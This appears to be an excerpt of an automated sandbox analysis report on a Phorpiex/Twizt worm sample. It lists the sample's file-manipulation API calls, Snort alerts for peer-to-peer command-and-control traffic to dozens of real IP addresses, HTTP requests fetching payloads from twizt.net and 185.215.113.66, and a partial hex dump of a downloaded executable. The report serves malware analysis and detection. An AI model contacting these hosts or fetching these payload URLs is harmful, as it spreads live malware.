Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	3_2_00406650
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	3_2_00406510
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_00406650
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406510
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	8_2_00406650
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406510

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856563 ETPRO TROJAN Phorpiex Domain in DNS Lookup 192.168.2.6:59936 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 120.237.99.181:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 85.113.19.18:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.200.152.6:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 82.114.186.50:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 95.71.69.217:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 36.20.68.95:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.180.157.70:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 186.94.185.219:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 197.148.34.173:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.200.190.214:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 39.53.75.107:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.218.235.182:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 95.58.18.206:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 31.186.54.5:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 217.20.222.188:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 91.234.219.185:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 41.102.227.47:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.74.170:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.185.146.181:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 82.194.11.2:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 37.20.161.137:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 151.233.73.168:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.219.115.32:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 128.65.176.18:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 212.112.112.84:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 92.47.124.54:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 181.114.188.143:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.236.226.70:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 46.35.86.48:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.190.224.61:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 92.46.174.254:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 31.186.49.163:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.251.56.144:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.173.140:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.233.222.244:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.81.188:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.191.221.216:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 189.158.148.85:40500
Source: Traffic	Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.163.241:40500

Contains functionality to check if Internet connection is working

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com	3_2_0040ACC0
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com	5_2_0040ACC0
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com	8_2_0040ACC0

Source: unknown

Network traffic detected: IP country count 20

Source: global traffic	TCP traffic: 192.168.2.6:49716 -> 134.35.81.188:40500
Source: global traffic	TCP traffic: 192.168.2.6:49724 -> 109.72.204.86:40500
Source: global traffic	TCP traffic: 192.168.2.6:49732 -> 213.230.90.222:40500
Source: global traffic	TCP traffic: 192.168.2.6:49739 -> 5.232.84.160:40500
Source: global traffic	TCP traffic: 192.168.2.6:49747 -> 195.181.62.5:40500
Source: global traffic	TCP traffic: 192.168.2.6:49755 -> 189.190.10.16:40500
Source: global traffic	TCP traffic: 192.168.2.6:49761 -> 94.141.69.176:40500
Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 156.212.34.122:40500
Source: global traffic	TCP traffic: 192.168.2.6:49770 -> 84.53.244.106:40500
Source: global traffic	TCP traffic: 192.168.2.6:49774 -> 195.158.15.3:40500
Source: global traffic	TCP traffic: 192.168.2.6:49778 -> 109.122.77.179:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 120.237.99.181:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 85.113.19.18:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 5.200.152.6:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 82.114.186.50:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 95.71.69.217:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 95.107.12.43:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 36.20.68.95:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 2.180.157.70:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 186.94.185.219:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 197.148.34.173:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 5.200.190.214:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 5.63.93.62:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 39.53.75.107:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 89.218.235.182:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 95.58.18.206:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 31.186.54.5:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 217.20.222.188:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 134.35.185.171:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 91.234.219.185:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 41.102.227.47:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 134.35.74.170:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 2.185.146.181:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 82.194.11.2:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 95.156.103.50:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 37.20.161.137:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 151.233.73.168:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 89.219.115.32:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 128.65.176.18:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 212.112.112.84:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 185.177.0.227:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 92.47.124.54:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 181.114.188.143:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 89.236.226.70:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 46.35.86.48:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 2.190.224.61:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 105.109.202.176:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 92.46.174.254:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 31.186.49.163:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 5.251.56.144:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 134.35.173.140:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 5.233.222.244:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 151.233.21.215:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 2.191.221.216:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 189.158.148.85:40500
Source: global traffic	UDP traffic: 192.168.2.6:59141 -> 134.35.163.241:40500

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:06:57 GMTContent-Type: application/octet-streamContent-Length: 86016Last-Modified: Tue, 23 Apr 2024 21:19:33 GMTConnection: keep-aliveETag: "662825e5-15000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d ab 71 6a 29 ca 1f 39 29 ca 1f 39 29 ca 1f 39 20 b2 95 39 2e ca 1f 39 51 b8 1e 38 2b ca 1f 39 ea c5 42 39 2b ca 1f 39 ea c5 40 39 28 ca 1f 39 ea c5 10 39 2b ca 1f 39 0e 0c 72 39 2d ca 1f 39 29 ca 1e 39 e9 ca 1f 39 0e 0c 64 39 3c ca 1f 39 20 b2 9c 39 2d ca 1f 39 20 b2 9b 39 35 ca 1f 39 20 b2 8e 39 28 ca 1f 39 52 69 63 68 29 ca 1f 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 25 28 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 78 00 00 00 00 00 00 d0 74 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 27 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 37 00 00 00 00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 3f 00 00 00 40 01 00 00 2e 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	ASN Name: TPSUZ-ASUZ TPSUZ-ASUZ
Source: Joe Sandbox View	ASN Name: PTC-YEMENNETYE PTC-YEMENNETYE

Source: global traffic	HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66

Source: unknown	TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown	TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown	TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown	TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown	TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown	TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.177

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Code function: 0_2_00531080 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,Sleep,wsprintfW,DeleteFileW,Sleep,CloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,Sleep,

0_2_00531080

Source: global traffic	HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
